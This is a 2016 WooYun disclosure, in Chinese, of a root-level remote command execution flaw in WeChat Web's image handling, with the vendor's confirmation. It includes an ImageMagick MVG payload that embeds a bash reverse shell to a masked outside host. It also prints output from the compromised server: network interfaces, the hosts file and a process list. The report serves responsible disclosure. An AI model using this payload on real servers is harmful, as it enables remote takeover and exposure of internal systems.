当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0205514

漏洞标题:微信网页版服务器存在远程命令执行漏洞

相关厂商:腾讯

漏洞作者: 猪猪侠

提交时间:2016-05-05 22:47

修复时间:2016-06-24 10:30

公开时间:2016-06-24 10:30

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-05: 细节已通知厂商并且等待厂商处理中
2016-05-10: 厂商已经确认,细节仅向厂商公开
2016-05-20: 细节向核心白帽子及相关领域专家公开
2016-05-30: 细节向普通白帽子公开
2016-06-09: 细节向实习白帽子公开
2016-06-24: 细节向公众公开

简要描述:

微信网页版服务器存在远程命令执行漏洞,root权限,呵呵

详细说明:

#1 存在漏洞服务器地址
https://wx2.qq.com/
#2 与自己聊天发送一个图片

wx.png


#3 payload

push graphic-context 
viewbox 0 0 640 480
fill 'url(https://"|/bin/bash -i >& /dev/tcp/*.*.*.*/8080 0>&1")'
pop graphic-context

漏洞证明:

#4 获得一个远程SHELL

root@10.54.*.*:~# /sbin/ifconfig -a
eth0 Link encap:Ethernet HWaddr *.**.**.*
inet addr:223.167.*.* Bcast:223.167.*.* Mask:255.255.255.128
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:207675290974 errors:0 dropped:0 overruns:0 frame:0
TX packets:381824340869 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:64553957542020 (61563451.3 Mb) TX bytes:484719339307282 (462264384.5 Mb)
eth1 Link encap:Ethernet HWaddr *.**.**.**.*
inet addr:10.54.*.* Bcast:10.54.*.* Mask:255.255.255.192
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:79387181028 errors:0 dropped:0 overruns:0 frame:0
TX packets:233634377039 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:604955868080734 (576930873.9 Mb) TX bytes:262973934281267 (250791487.0 Mb)
ip6tnl0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
NOARP MTU:1460 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:532406147 errors:0 dropped:0 overruns:0 frame:0
TX packets:532406147 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:14164026742798 (13507868.5 Mb) TX bytes:14164026742798 (13507868.5 Mb)
sit0 Link encap:IPv6-in-IPv4
NOARP MTU:1480 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
tunl0 Link encap:IPIP Tunnel HWaddr
NOARP MTU:1480 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
root@10.54.*.*:~# cat /etc/hosts
#
# hosts This file describes a number of hostname-to-address
# mappings for the TCP/IP subsystem. It is mostly
# used at boot time, when no name servers are running.
# On small systems, this file can be used instead of a
# "named" name server.
# Syntax:
#
# IP-Address Full-Qualified-Hostname Short-Hostname
#
127.0.0.1 Tencent64.site Tencent64 localhost
# special IPv6 addresses


root      4307     1  0 Apr08 ?        00:00:27 /usr/local/agenttools/agent/agent -c /usr/local/agenttools/agent/client.conf
root 4323 1 0 Apr08 ? 00:00:03 /usr/local/agenttools/agent/agentPlugInD
root 4341 1 0 Apr08 ? 01:37:02 /usr/local/agenttools/agent/base -d5 -c1 -m4 -s /usr/local/agenttools/agent/base.conf
root 4350 1 0 Apr08 ? 00:00:49 /usr/local/agenttools/agent/tcvmstat
root 4449 1 0 Apr08 ? 00:01:49 /usr/local/agenttools/agent/sysddd
root 6234 2 0 Jan18 ? 00:19:57 [flush-8:0]
root 6664 1 0 Jan20 ? 00:00:07 nws-watchdog
root 6665 6664 0 Jan20 ? 07:37:33 nws:http.so,worker_0-2
root 6692 2 0 Jan18 ? 00:04:48 [kjournald]
root 6693 2 0 Jan18 ? 00:05:46 [kjournald]
100 7321 1 0 Jan18 ? 00:00:05 /usr/bin/dbus-daemon --system
root 7341 1 0 Jan18 ? 00:00:01 /usr/sbin/hald --daemon=yes --retain-privileges
root 7682 1 0 15:37 ? 00:00:00 /bin/sh /usr/local/sa/agent/watchdog.sh
root 8028 1 0 15:37 ? 00:00:18 /usr/local/sa/agent/secu-tcs-agent
root 8036 1 0 Jan18 ? 00:00:00 /usr/local/sbin/sshd -f /etc/ssh2/sshd2_config.l
root 8045 1 0 Jan18 ? 00:00:00 /usr/local/sbin/sshd

修复方案:

# 补丁

版权声明:转载请注明来源 猪猪侠@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-05-10 10:29

厂商回复:

非常感谢您的报告,IM组件的问题,已经有白帽子在tsrc平台报告过,此问题我们已经第一时间紧急处理。感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,

最新状态:

暂无